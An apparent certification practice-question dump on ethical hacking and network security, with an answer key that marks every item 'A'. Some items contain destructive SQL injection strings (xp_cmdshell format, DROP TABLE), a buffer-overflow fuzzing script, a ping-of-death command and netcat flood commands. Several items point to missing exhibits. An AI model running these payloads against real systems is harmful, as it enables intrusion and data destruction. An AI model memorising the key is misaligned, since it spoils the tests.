176 When setting up a wireless network, an administrator enters a pre-shared key for security. Which of the following is true? A. The key entered is a symmetric key used to encrypt the wireless data B. The key entered is a hash that is used to prove the integrity of the wireless data C. The key entered is based on the Diffie-Hellman method D. The key is an RSA key used to encrypt the wireless datA.

A

184 Which of the following is a primary service of the U.S. Computer Security Incident Response Team (CSIRT)? A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide B. CSIRT provides a computer security surveillance service to supply a government with important intelligence information on individuals travelling abroad C. CSIRT provides a penetration testing service to support exception reporting on incidents worldwide by individuals and multi-national corporations. D. CSIRT provides a vulnerability assessment service to assist law enforcement agencies with profiling an individual's property or company's asset.

A

185 Which of the following items is unique to the N-tier architecture method of designing software applications? A. Application layers can be separated, allowing each layer to be upgraded independently from other layers. B. It is compatible with various databases including Access, Oracle, and SQL. C. Data security is tied into each layer and must be updated for all layers when any upgrade is performed D. Application layers can be written in C, ASP.NET, or Delphi without any performance loss.

A

186 If a tester is attempting to ping a target that exists but receives no response or a response that states the destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option could the tester use to get a response from a host using TCP? A. Hping B. Traceroute C. TCP ping D. Broadcast ping

A

188 Which of the following network attacks takes advantage of weaknesses in the fragment reassembly functionality of the TCP/IP protocol stack? A. Teardrop B. SYN flood C. Smurf attack D. Ping of death

A

189 Employees in a company are no longer able to access Internet web sites on their computers. The network administrator is able to successfully ping IP address of web servers on the Internet and is able to open web sites by using an IP address in place of the URL. The administrator runs the nslookup command for www.eccouncil.org and receives an error message stating there is no response from the server. What should the administrator do next? A. Configure the firewall to allow traffic on TCP ports 53 and UDP port 53. B. Configure the firewall to allow traffic on TCP ports 80 and UDP port 443. C. Configure the firewall to allow traffic on TCP port 53. D. Configure the firewall to allow traffic on TCP port 8080.

A

191 Which of the following is an advantage of utilizing security testing methodologies to conduct a security audit? A. They provide a repeatable framework. B. Anyone can run the command line scripts. C. They are available at low cost. D. They are subject to government regulation.

A

200 Which of the following levels of algorithms does Public Key Infrastructure (PKI) use? A. RSA 1024 bit strength B. AES 1024 bit strength C. RSA 512 bit strength D. AES 512 bit strength

A

207 Which of the following network attacks relies on sending an abnormally large packet size that exceeds TCP/IP specifications? A. Ping of death B. SYN flooding C. TCP hijacking D. Smurf attack

A

208 Which NMAP feature can a tester implement or adjust while scanning for open ports to avoid detection by the network's IDS? A. Timing options to slow the speed that the port scan is conducted B. Fingerprinting to identify which operating systems are running on the network C. ICMP ping sweep to determine which hosts on the network are not available D. Traceroute to control the path of the packets sent during the scan

A

212 How would you describe an attack where an attacker attempts to deliver the payload over multiple packets over long periods of time with the purpose of defeating simple pattern matching in IDS systems without session reconstruction? A characteristic of this attack would be a continuous stream of small packets. A. Session Splicing B. Session Stealing C. Session Hijacking D. Session Fragmentation

A

216 Which vital role does the U.S. Computer Security Incident Response Team (CSIRT) provide? A. Incident response services to any user, company, government agency, or organization in partnership with the Department of Homeland Security B. Maintenance of the nation's Internet infrastructure, builds out new Internet infrastructure, and decommissions old Internet infrastructure C. Registration of critical penetration testing for the Department of Homeland Security and public and private sectors D. Measurement of key vulnerability assessments on behalf of the Department of Defense (DOD) and State Department, as well as private sectors

A

220 When does the Payment Card Industry Data Security Standard (PCI-DSS) require organizations to perform external and internal penetration testing? A. At least once a year and after any significant upgrade or modification B. At least once every three years or after any significant upgrade or modification C. At least twice a year or after any significant upgrade or modification D. At least once every two years and after any significant upgrade or modification

A

223 Which method can provide a better return on IT security investment and provide a thorough and comprehensive assessment of organizational security covering policy, procedure design, and implementation? A. Penetration testing B. Social engineering C. Vulnerability scanning D. Access control list reviews

A

225 International Organization for Standardization (ISO) standard 27002 provides guidance for compliance by outlining A. guidelines and practices for security controls. B. financial soundness and business viability metrics. C. standard best practice for configuration management. D. contract agreement writing standards.

A

23 Which system consists of a publicly available set of databases that contain domain name registration contact information? A. WHOIS B. IANA C. CAPTCHA D. IETF

A

268 Your company performs penetration tests and security assessments for small and medium-sized business in the local area. During a routine security assessment, you discover information that suggests your client is involved with human trafficking. What should you do? A. Immediately stop work and contact the proper legal authorities. B. Copy the data to removable media and keep it in case you need it. C. Confront the client in a respectful manner and ask her about the data D. Ignore the data and continue the assessment until completed as agreed

A

27 An NMAP scan of a server shows port 69 is open. What risk could this pose? A. Unauthenticated access B. Weak SSL version C. Cleartext login D. Web portal data leak

A

277 After trying multiple exploits, you've gained root access to a Centos 6 server. To ensure you maintain access, what would you do first? A. Create User Account B. Disable Key Services C. Disable IPTables D. Download and Install Netcat

A

297 You are performing a penetration test. You achieved access via a buffer overflow exploit and you proceed to find interesting data, such as files with usernames and passwords. You find a hidden folder that has the administrator's bank account password and login information for the administrator's bitcoin account. What should you do? A. Report immediately to the administrator B. Do not report it and continue the penetration test. C. Transfer money from the administrator's account to another account. D. Do not transfer the money but steal the bitcoins.

A

303 Which of the following is not a Bluetooth attack? A. Bluedriving B. Bluejacking C. Bluesmacking D. Bluesnarfing

A

31 Which of the following is a preventive control? A. Smart card authentication B. Security policy C. Audit trail D. Continuity of operations plan

A

33 Which security control role does encryption meet? A. Preventative B. Detective C. Offensive D. Defensive

A

34 A covert channel is a channel that A. transfers information over, within a computer system, or network that is outside of the security policy. B. transfers information over, within a computer system, or network that is within the security policy. C. transfers information via a communication path within a computer system, or network for transfer of data. D. transfers information over, within a computer system, or network that is encrypted.

A

346 Bubba has just accessed he preferred ecommerce web site and has spotted an item that he would like to buy. Bubba considers the price a bit too steep. He looks at the source code of the webpage and decides to save the page locally, so that he can modify the page variables. In the context of web application security, what do you think Bubba has changes? A. A hidden form field value. B. A hidden price value. C. An integer variable. D. A page cannot be changed locally, as it is served by a web server.

A

359 What two conditions must a digital signature meet? A. Has to be unforgeable, and has to be authentic B. Has to be legible and neat. C. Must be unique and have special characters. D. Has to be the same number of characters as a physical signature and must be unique

A

36 Least privilege is a security concept that requires that a user is A. limited to those functions required to do the job. B. given root or administrative privileges. C. trusted to keep all data and access to that data under their sole control. D. given privileges equal to everyone else in the department.

A

361 If executives are found liable for not properly protecting their company's assets and information systems, what type of law would apply in this situation? A. Civil B. International C. Criminal D. Common

A

362 What is the role of test automation in security testing? A. It can accelerate benchmark tests and repeat them with a consistent test setup. But it cannot replace manual testing completely. B. It is an option but it tends to be very expensive. C. It should be used exclusively. Manual testing is outdated because of low speed and possible test setup inconsistencies. D. Test automation is not usable in security due to the complexity of the tests.

A

364 Bret is a web application administrator and has just read that there are a number of surprisingly common web application vulnerabilities that can be exploited by unsophisticated attackers with easily available tools on the Internet. He has also read that when an organization deploys a web application, they invite the world to send HTTP requests. Attacks buried in these requests sail past firewalls, filters, platform hardening, SSL, and IDS without notice because they are inside legal HTTP requests. Bret is determined to weed out any vulnerabilities. What are some common vulnerabilities in web applications that he should be concerned about? A. Non-validated parameters, broken access control, broken account and session management, cross-side scripting and buffer overflows are just a few common vulnerabilities B. No IDS configured, anonymous user account set as default, missing latest security patch, no firewall filters set and visible clear text passwords are just a few common vulnerabilities C. Visible clear text passwords, anonymous user account set as default, missing latest security patch, no firewall filters set and no SSL configured are just a few common vulnerabilities D. No SSL configured, anonymous user account set as default, missing latest security patch, no firewall filters set and an inattentive system administrator are just a few common vulnerabilities

A

365 A hacker has managed to gain access to a Linux host and stolen the password file from /etc/passwd. How can he use it? A. The password file does not contain the passwords themselves. B. He can open it and read the user ids and corresponding passwords. C. The file reveals the passwords to the root user only. D. He cannot read it because it is encrypted.

A

367 What is the way to decide how a packet will move from an untrusted outside host to a protected inside that is behind a firewall, which permits the hacker to determine which ports are open and if the packets can pass through the packet-filtering of the firewall. A. Firewalking B. Session hijacking C. Network sniffing D. Man-in-the-middle attack

A

371 _________ is a set of extensions to DNS that provide to DNS clients (resolvers) origin authentication of DNS data to reduce the threat of DNS poisoning, spoofing, and similar attacks types. A. DNSSEC B. Zone transfer C. Resource transfer D. Resource records

A

372 Sid is a judge for a programming contest. Before the code reaches him it goes through a restricted OS and is tested there. If it passes, then it moves onto Sid. What is this middle step called? A. Fuzzy-testing the code B. Third party running the code C. Sandboxing the code D. String validating the code

A

375 In both pharming and phishing attacks an attacker can create websites that look similar to legitimate sites with the intent of collecting personal identifiable information from its victims. What is the difference between pharming and phishing attacks? A. In a pharming attack a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a phishing attack an attacker provides the victim with a URL that is either misspelled or looks similar to the actual websites domain name B. Both pharming and phishing attacks are purely technical and are not considered forms of social engineering. C. Both pharming and phishing attacks are identical. D. In a phishing attack a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a pharming attack an attacker provides the victim with a URL that is either misspelled or looks very similar to the actual websites domain name

A

38 The following excerpt is taken from a honeyput log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. Study the log given below and answer the following question: (Note: The objective of this questions is to test whether the student has learnt about passive OS fingerprinting (which should tell them the OS from log captures): can they tell a SQL injection attack signature; can they infer if a user ID has been created by an attacker and whether they can read plain source - destination entries from log entries.) What can you infer from the above log? A. The system is a windows system which is being scanned unsuccessfully. B. The system is a web application server compromised through SQL injection. 24 C. The system has been compromised and backdoored by the attacker. D. The actual IP of the successful attacker is 24.9.255.53.

A

383 Attempting an injection attack on a web server based on responses to True/False questions is called which of the following? A. Blind SQLi B. DMS-specific SQLi C. Classic SQLi D. Compound SQLi

A

384 Exhibit: You are conducting pen-test against a company's website using SQL Injection techniques. You enter "anuthing or 1=1-" in the username filed of an authentication form. This is the output returned from the server. What is the next step you should do? A. Identify the user context of the web application by running_ http://www.example.com/order/include_rsa_asp?pressReleaseID=5 AND USER_NAME() = 'dbo' B. Identify the database and table name by running: 230 http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) > 109 C. Format the C: drive and delete the database by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'format c: /q /yes '; drop database myDB; -- D. Reboot the web server by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset -reboot'; --

A

387 An attacker with access to the inside network of a small company launches a successful STP manipulation attack. What will he do next? A. He will create a SPAN entry on the spoofed root bridge and redirect traffic to his computer. B. He will activate OSPF on the spoofed root bridge C. He will repeat the same attack against all L2 switches of the network. D. He will repeat this action so that it escalates to a DoS attack.

A

388 A large mobile telephony and data network operator has a data that houses network elements. These are essentially large computers running on Linux. The perimeter of the data center is secured with firewalls and IPS systems. What is the best security policy concerning this setup? A. Network elements must be hardened with user ids and strong passwords. Regular security tests and audits should be performed B. As long as the physical access to the network elements is restricted, there is no need for additional measures. C. There is no need for specific security measures on the network elements as long as firewalls and IPS systems exist. D. The operator knows that attacks and down time are inevitable and should have a backup site

A

39 Which of the following examples best represents a logical or technical control? A. Security tokens B. Heating and air conditioning C. Smoke and fire alarms D. Corporate security policy

A

397 Which protocol is used for setting up secured channels between two devices, typically in VPNs? A. IPSEC B. PEM C. SET D. PPP

A

413 Which Intrusion Detection System is best applicable for large environments where critical assets on the network need extra security and is ideal for observing sensitive network segments? A. Network-based intrusion detection system (NIDS) B. Host-based intrusion detection system (HIDS) C. Firewalls D. Honeypots

A

432 Your next door neighbor, that you do not get along with, is having issues with their network, so he yells to his spouse the network's SSID and password and you hear them both clearly. What do you do with this information? A. Nothing, but suggest to him to change the network's SSID and password B. Sell his SSID and password to friends that come to your house, so it doesn't slow down your network. C. Log onto to his network, after all it's his fault that you can get in. D. Only use his network when you have large downloads so you don't tax your own network.

A

434 You want to analyze packets on your wireless network. Which program would you use? A. Wireshark with Airpcap B. Airsnort with Airpcap C. Wireshark with Winpcap D. Ethereal with Winpcap

A

435 It has been reported to you that someone has caused an information spillage on their computer. You go to the computer, disconnect it from the network, remove the keyboard and mouse, and power it down. What step in incident handling did you just complete? A. Containment B. Eradication C. Recovery D. Discovery

A

436 #!/usr/bin/python import socket 250 buffer=["A"] counter=50 while len(buffer)<=100: buffer.apend ("A"*counter) counter=counter+50 commands=["HELP","STATS.","RTIME.","LTIME.","SRUN.","TRUN.","GMON.","GDOG.","KSTET.", "GTER.","HTER.","LTER.","KSTAN."] for command in commands: for buffstring in buffer: print "Exploiting" +command+":"+str(len(buffstring)) s=socket.socket(socket.AF_INET.socket.SOCK_STREAM) s.connect(('127.0.0.1',9999)) s.recv(50) s.send(command+buffstring) s.close() What is the code written for? A. Buffer Overflow B. Encryption C. Bruteforce D. Denial-of-service (Dos)

A

450 Security and privacy of/on information systems are two entities that requires lawful regulations. Which of the following regulations defines security and privacy controls for Federal information systems and organizations? A. NIST SP 800-53 B. PCI-DSS C. EU Safe Harbor D. HIPAA

A

464 What is the best Nmap command to use when you want to list all devices in the same network quickly after you successfully identified a server whose IP address is 10.10.0.5? A. nmap -T4 -F 10.10.0.0/24 B. nmap -T4 -q 10.10.0.0/24 C. nmap -T4 -O 10.10.0.0/24 D. nmap -T4 -r 10.10.1.0/24

A

468 While you were gathering information as part of security assessments for one of your clients, you were able to gather data that show your client is involved with fraudulent activities. What should you do? A. Immediately stop work and contact the proper legal authorities B. Ignore the data and continue the assessment until completed as agreed C. Confront the client in a respectful manner and ask her about the data D. Copy the data to removable media and keep it in case you need it

A

471 Which of the following BEST describes the mechanism of a Boot Sector Virus? A. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR B. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR C. Overwrites the original MBR and only executes the new virus code D. Modifies directory table entries so that directory entries point to the virus code instead of the actual program

A

477 Defining rules, collaborating human workforce, creating a backup plan, and testing the plans are within what phase of the Incident Handling Process? A. Preparation phase B. Containment phase C. Recovery phase D. Identification phase

A

48 Which property ensures that a hash function will not produce the same hashed value for two different messages? A. Collision resistance B. Bit length C. Key strength D. Entropy

A

482 What type of malware is it that restricts access to a computer system that it infects and demands that the user pay a certain amount of money, cryptocurrency, etc. to the operators of the malware to remove the restriction? A. Ransomware B. Riskware C. Adware D. Spyware

A

49 How can telnet be used to fingerprint a web server? A. telnet webserverAddress 80 HEAD / HTTP/1.0 B. telnet webserverAddress 80 PUT / HTTP/1.0 C. telnet webserverAddress 80 HEAD / HTTP/2.0 D. telnet webserverAddress 80 PUT / HTTP/2.0

A

492 Which of the following is a wireless network detector that is commonly found on Linux? A. Kismet B. Abel C. Netstumbler D. Nessus

A

495 Which of the following is a vulnerability in GNU's bash shell (discovered in September of 2014) that gives attackers access to run remote commands on a vulnerable system? A. Shellshock B. Rootshell C. Rootshock D. Shellbash

A

497 Jack was attempting to fingerprint all machines in the network using the following Nmap syntax: invictus@victim_server:~$ nmap -T4 -0 10.10.0.0/24 282 TCP/IP fingerprinting (for OS scan) xxxxxxx xxxxxx xxxxxxxxx. QUITTING! Obviously, it is not going through. What is the issue here? A. OS Scan requires root privileges B. The nmap syntax is wrong. C. The outgoing TCP/IP fingerprinting is blocked by the host firewall D. This is a common behavior for a corrupted nmap application

A

512 Blake is in charge of securing all 20 of his company's servers. He has enabled hardware and software firewalls, hardened the operating systems and disabled all unnecessary service on all the servers. Unfortunately, there is proprietary AS400 emulation software that must run on one of the servers that requires the telnet service to function properly. Blake is especially concerned about his since telnet can be a very large security risk in an organization. Blake is concerned about how his particular server might look to an outside attacker so he decides to perform some footprinting scanning and penetration tests on the server. Blake telents into the server and types the following command: HEAD/HTTP/1.0 After pressing enter twice, Blake gets the following results: What has the Blake just accomplished? A. Grabbed the banner B. Downloaded a file to his local computer C. Submitted a remote command to crash the server D. Poisoned the local DNS cache of the server

A

601 Curt has successfully compromised a web server sitting behind a firewall using a vulnerability in the web server program. He would now like to install a backdoor program but knows that all ports are not open inbound on the firewall. Which port in the list below will most likely be open and allowed to reach the server that Curt has just compromised? (Select the Best Answer) A. 53 B. 25 C. 110 363 D. 69

A

614 The following script shows a simple SQL injection. The script builds an SQL query by concatenating hard-coded strings together with a string entered by the user: The user is prompted to enter the name of a city on a Web form. If she enters Chicago, the query assembled by the script looks similar to the following: SELECT * FROM OrdersTable WHERE ShipCity = 'Chicago' How will you delete the OrdersTable from the database using SQL Injection? A. Chicago'; drop table OrdersTable -- B. Delete table'blah'; OrdersTable -- C. EXEC; SELECT * OrdersTable > DROP -- D. cmdshell'; 'del c:\sql\mydb\OrdersTable' //

A

618 An attacker finds a web page for a target organization that supplies contact information for the company. Using available details to make the message seem authentic, the attacker drafts e-mail to an employee on the contact page that appears to come from an individual who might reasonably request confidential information, such as a network administrator. The email asks the employee to log into a bogus page that requests the employee's user name and password or click on a link that will download spyware or other malicious programming. Google's Gmail was hacked using this technique and attackers stole source code and sensitive data from Google servers. This is highly sophisticated attack using zero-day exploit vectors, social engineering and malware websites that focused on targeted individuals working for the company. 373 What is this deadly attack called? A. Spear phishing attack B. Trojan server attack C. Javelin attack D. Social networking attack

A

627 Google uses a unique cookie for each browser used by an individual user on a computer. This cookie contains information that allows Google to identify records about that user on its database. This cookie is submitted every time a user launches a Google search, visits a site using AdSense etc. The information stored in Google's database, identified by the cookie, includes Everything you search for using Google Every web page you visit that has Google Adsense ads How would you prevent Google from storing your search keywords? 378 A. Block Google Cookie by applying Privacy and Security settings in your web browser B. Disable the Google cookie using Google Advanced Search settings on Google Search page C. Do not use Google but use another search engine Bing which will not collect and store your search keywords D. Use MAC OS X instead of Windows 7. Mac OS has higher level of privacy controls by default.

A

63 During a wireless penetration test, a tester detects an access point using WPA2 encryption. Which of the following attacks should be used to obtain the key? A. The tester must capture the WPA2 authentication handshake and then crack it. B. The tester must use the tool inSSIDer to crack it using the ESSID of the network. C. The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard. D. The tester must change the MAC address of the wireless network card and then use the AirTraf tool to obtain the key.

A

635 Shayla is an IT security consultant, specializing in social engineering and external penetration tests. Shayla has been hired on by Treks Avionics, a subcontractor for the Department of Defense. Shayla has been given authority to perform any and all tests necessary to audit the company's network security. No employees for the company, other than the IT director, know about Shayla's work she will be doing. Shayla's first step is to obtain a list of employees through company website contact pages. Then she befriends a female employee of the company through an online chat website. After meeting with the female employee numerous times, Shayla is able to gain her trust and they become friends. One day, Shayla steals the employee's access badge and uses it to gain unauthorized access to the Treks Avionics offices. What type of insider threat would Shayla be considered? A. She would be considered an Insider Affiliate B. Because she does not have any legal access herself, Shayla would be considered an Outside 383 Affiliate C. Shayla is an Insider Associate since she has befriended an actual employee D. Since Shayla obtained access with a legitimate company badge; she would be considered a Pure Insider

A

637 A common technique for luring e-mail users into opening virus-launching attachments is to send messages that would appear to be relevant or important to many of their potential recipients. One way of accomplishing this feat is to make the virus-carrying messages appear to come from some type of business entity retailing sites, UPS, FEDEX, CITIBANK or a major provider of a common service. Here is a fraudulent e-mail claiming to be from FedEx regarding a package that could not be delivered. This mail asks the receiver to open an attachment in order to obtain the FEDEX tracking number for picking up the package. The attachment contained in this type of e-mail activates a virus. 384 Vendors send e-mails like this to their customers advising them not to open any files attached with the mail, as they do not include attachments. Fraudulent e-mail and legit e-mail that arrives in your inbox contain the fedex.com as the sender of the mail. How do you ensure if the e-mail is authentic and sent from fedex.com? A. Verify the digital signature attached with the mail, the fake mail will not have Digital ID at all B. Check the Sender ID against the National Spam Database (NSD) C. Fake mail will have spelling/grammatical errors D. Fake mail uses extensive images, animation and flash content

A

64 Which type of antenna is used in wireless communication? A. Omnidirectional B. Parabolic C. Uni-directional D. Bi-directional

A

641 Which Steganography technique uses Whitespace to hide secret messages? A. snow B. beetle C. magnet D. cat

A

650 Web servers often contain directories that do not need to be indexed. You create a text file with search engine indexing restrictions and place it on the root directory of the Web Server. User-agent: * Disallow: /images/ Disallow: /banners/ Disallow: /Forms/ Disallow: /Dictionary/ Disallow: /_borders/ Disallow: /_fpclass/ Disallow: /_overlay/ Disallow: /_private/ Disallow: /_themes/ 393 What is the name of this file? A. robots.txt B. search.txt C. blocklist.txt D. spf.txt

A

651 Attackers target HINFO record types stored on a DNS server to enumerate information. These are information records and potential source for reconnaissance. A network administrator has the option of entering host information specifically the CPU type and operating system when creating a new DNS record. An attacker can extract this type of information easily from a DNS server. Which of the following commands extracts the HINFO record? 394 A. Option A B. Option B C. Option C D. Option D

A

652 What is War Dialing? A. War dialing involves the use of a program in conjunction with a modem to penetrate the modem/PBX-based systems B. War dialing is a vulnerability scanning technique that penetrates Firewalls C. It is a social engineering technique that uses Phone calls to trick victims D. Involves IDS Scanning Fragments to bypass Internet filters and stateful Firewalls

A

656 This tool is widely used for ARP Poisoning attack. Name the tool. 396 A. Cain and Able B. Beat Infector C. Poison Ivy D. Webarp Infector

A

658 You receive an e-mail with the following text message. "Microsoft and HP today warned all customers that a new, highly dangerous virus has been discovered which will erase all your files at midnight. If there's a file called hidserv.exe on your computer, you have been infected and your computer is now running a hidden server that allows hackers to access your computer. Delete the file immediately. Please also pass this message to all your friends and colleagues as soon as possible." 398 You launch your antivirus software and scan the suspicious looking file hidserv.exe located in c:\windows directory and the AV comes out clean meaning the file is not infected. You view the file signature and confirm that it is a legitimate Windows system file "Human Interface Device Service". What category of virus is this? A. Virus hoax B. Spooky Virus C. Stealth Virus D. Polymorphic Virus

A

659 One of the effective DoS/DDoS countermeasures is 'Throttling'. Which statement correctly defines this term? A. Set up routers that access a server with logic to adjust incoming traffic to levels that will be safe for the server to process B. Providers can increase the bandwidth on critical connections to prevent them from going down in the event of an attack C. Replicating servers that can provide additional failsafe protection D. Load balance each server in a multiple-server architecture

A

674 In this type of Man-in-the-Middle attack, packets and authentication tokens are captured using a 407 sniffer. Once the relevant information is extracted, the tokens are placed back on the network to gain access. A. Token Injection Replay attacks B. Shoulder surfing attack C. Rainbow and Hash generation attack D. Dumpster diving attack

A

675 Jason is the network administrator of Spears Technology. He has enabled SNORT IDS to detect attacks going through his network. He receives Snort SMS alerts on his iPhone whenever there is an attempted intrusion to his network. He receives the following SMS message during the weekend. An attacker Chew Siew sitting in Beijing, China had just launched a remote scan on Jason's network with the hping command. Which of the following hping2 command is responsible for the above snort alert? A. chenrocks:/home/siew # hping -S -R -P -A -F -U 192.168.2.56 -p 22 -c 5 -t 118 B. chenrocks:/home/siew # hping -F -Q -J -A -C -W 192.168.2.56 -p 22 -c 5 -t 118 408 C. chenrocks:/home/siew # hping -D -V -R -S -Z -Y 192.168.2.56 -p 22 -c 5 -t 118 D. chenrocks:/home/siew # hping -G -T -H -S -L -W 192.168.2.56 -p 22 -c 5 -t 118

A

685 Your company has blocked all the ports via external firewall and only allows port 80/443 to connect to the Internet. You want to use FTP to connect to some remote server on the Internet. How would you accomplish this? A. Use HTTP Tunneling B. Use Proxy Chaining C. Use TOR Network D. Use Reverse Chaining

A

688 In which location, SAM hash passwords are stored in Windows 7? A. c:\windows\system32\config\SAM B. c:\winnt\system32\machine\SAM C. c:\windows\etc\drivers\SAM D. c:\windows\config\etc\SAM

A

691 One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to the broadcast or the network address. The request would be broadcasted to all hosts on the targeted network. The live hosts will send an ICMP ECHO Reply to the attacker's source IP address. You send a ping request to the broadcast address 192.168.5.255. There are 40 computers up and running on the target network. Only 13 hosts send a reply while others do not. Why? A. Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO 416 request aimed at the broadcast address or at the network address. B. Linux machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address. C. You should send a ping request with this command ping ? 192.168.5.0-255 D. You cannot ping a broadcast address. The above scenario is wrong.

A

692 Charlie is the network administrator for his company. Charlie just received a new Cisco router and wants to test its capabilities out and to see if it might be susceptible to a DoS attack resulting in its locking up. The IP address of the Cisco switch is 172.16.0.45. What command can Charlie use to attempt this task? A. Charlie can use the command: ping -l 56550 172.16.0.45 -t. B. Charlie can try using the command: ping 56550 172.16.0.45. C. By using the command ping 172.16.0.45 Charlie would be able to lockup the router D. He could use the command: ping -4 56550 172.16.0.45.

A

699 Frederickson Security Consultants is currently conducting a security audit on the networks of Hawthorn Enterprises, a contractor for the Department of Defense. Since Hawthorn Enterprises conducts business daily with the federal government, they must abide by very stringent security policies. Frederickson is testing all of Hawthorn's physical and logical security measures including biometrics, passwords, and permissions. The federal government requires that all users must utilize random, non-dictionary passwords that must take at least 30 days to crack. Frederickson has confirmed that all Hawthorn employees use a random password generator for their network passwords. The Frederickson consultants have saved off numerous SAM files from Hawthorn's servers using Pwdump6 and are going to try and crack the network passwords. What method of attack is best suited to crack these passwords in the shortest amount of time? A. Brute force attack B. Birthday attack C. Dictionary attack D. Brute service attack

A

71 A pentester gains access to a Windows application server and needs to determine the settings of the built-in Windows firewall. Which command would be used? A. Netsh firewall show config B. WMIC firewall show config C. Net firewall show config D. Ipconfig firewall show config

A

79 A Network Administrator was recently promoted to Chief Security Officer at a local university. One of employee's new responsibilities is to manage the implementation of an RFID card access system to a new server room on campus. The server room will house student enrollment information that is securely backed up to an off-site location. During a meeting with an outside consultant, the Chief Security Officer explains that he is concerned that the existing security controls have not been designed properly. Currently, the Network Administrator is responsible for approving and issuing RFID card access to the server room, as well as reviewing the electronic access logs on a weekly basis. Which of the following is an issue with the situation? A. Segregation of duties B. Undue influence C. Lack of experience D. Inadequate disaster recovery plan

A

81 In the software security development life cycle process, threat modeling occurs in which phase? A. Design B. Requirements C. Verification D. Implementation

A

90 What technique is used to perform a Connection Stream Parameter Pollution (CSPP) attack? A. Injecting parameters into a connection string using semicolons as a separator B. Inserting malicious Javascript code into input parameters C. Setting a user's session identifier (SID) to an explicit known value D. Adding multiple parameters with the same name in HTTP requests

A

93 The use of alert thresholding in an IDS can reduce the volume of repeated alerts, but introduces which of the following vulnerabilities? A. An attacker, working slowly enough, can evade detection by the IDS. B. Network packets are dropped if the volume exceeds the threshold. C. Thresholding interferes with the IDS' ability to reassemble fragmented packets. D. The IDS will not distinguish among packets originating from different sources.

A

94 What is the main advantage that a network-based IDS/IPS system has over a host-based solution? A. They do not use host system resources. B. They are placed at the boundary, allowing them to inspect all traffic. C. They are easier to install and configure. D. They will not interfere with user interfaces.

A

99 From the two screenshots below, which of the following is occurring? First one: 1 [10.0.0.253]# nmap -sP 10.0.0.0/24 2 3 Starting Nmap 4 5 Host 10.0.0.1 appears to be up. 6 MAC Address: 00:09:5B:29:FD:96 (Netgear) 7 Host 10.0.0.2 appears to be up. 8 MAC Address: 00:0F:B5:96:38:5D (Netgear) 9 Host 10.0.0.4 appears to be up. 10 Host 10.0.0.5 appears to be up. 11 MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.) 12 Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds Second one: 1 [10.0.0.252]# nmap -sO 10.0.0.2 2 3 Starting Nmap 4.01 at 2006-07-14 12:56 BST 4 Interesting protocols on 10.0.0.2: 5 (The 251 protocols scanned but not shown below are 6 in state: closed) 7 PROTOCOL STATE SERVICE 8 1 open icmp 9 2 open|filtered igmp 10 6 open tcp 11 17 open udp 12 255 open|filtered unknown 13 14 Nmap finished: 1 IP address (1 host up) scanned in 15 1.259 seconds A. 10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2. B. 10.0.0.253 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2. C. 10.0.0.2 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2. D. 10.0.0.252 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.

A

279 Which one of the following network attacks takes advantages of weaknesses in the fragment reassembly functionality of the TCP/IP protocol stack? A. Teardrop B. Smurf C. Ping of Death D. SYN flood E. SNMP Attack

A (Explanation: 168 The teardrop attack uses overlapping packet fragments to confuse a target system and cause the system to reboot or crash.)

586 More sophisticated IDSs look for common shellcode signatures. But even these systems can be bypassed, by using polymorphic shellcode. This is a technique common among virus writers - it basically hides the true nature of the shellcode in different disguises. How does a polymorphic shellcode work? A. They convert the shellcode into Unicode, using loader to convert back to machine code then 354 executing them B. They compress shellcode into normal instructions, uncompress the shellcode using loader code and then executing the shellcode C. They reverse the working instructions into opposite order by masking the IDS signatures D. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode

A (Explanation: In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode)

230 You want to use netcat to generate huge amount of useless network data continuously for various performance testing between 2 hosts. Which of the following commands accomplish this? A. Machine A #yes AAAAAAAAAAAAAAAAAAAAAA | nc -v -v -l -p 2222 > /dev/null Machine B #yes BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/null B. Machine A cat somefile | nc -v -v -l -p 2222 Machine B cat somefile | nc othermachine 2222 138 C. Machine A nc -l -p 1234 | uncompress -c | tar xvfp Machine B tar cfp - /some/dir | compress -c | nc -w 3 machinea 1234 D. Machine A while true : do nc -v -l -s -p 6000 machineb 2 Machine B while true ; do nc -v -l -s -p 6000 machinea 2 done

A (Explanation: Machine A is setting up a listener on port 2222 using the nc command and then having the letter A sent an infinite amount of times, when yes is used to send data yes NEVER stops until it recieves a break signal from the terminal (Control+C), on the client end (machine B), nc is being used as a client to connect to machine A, sending the letter B and infinite amount of times, while both clients have established a TCP connection each client is infinitely sending data to each other, this process will run FOREVER until it has been stopped by an administrator or the attacker.)

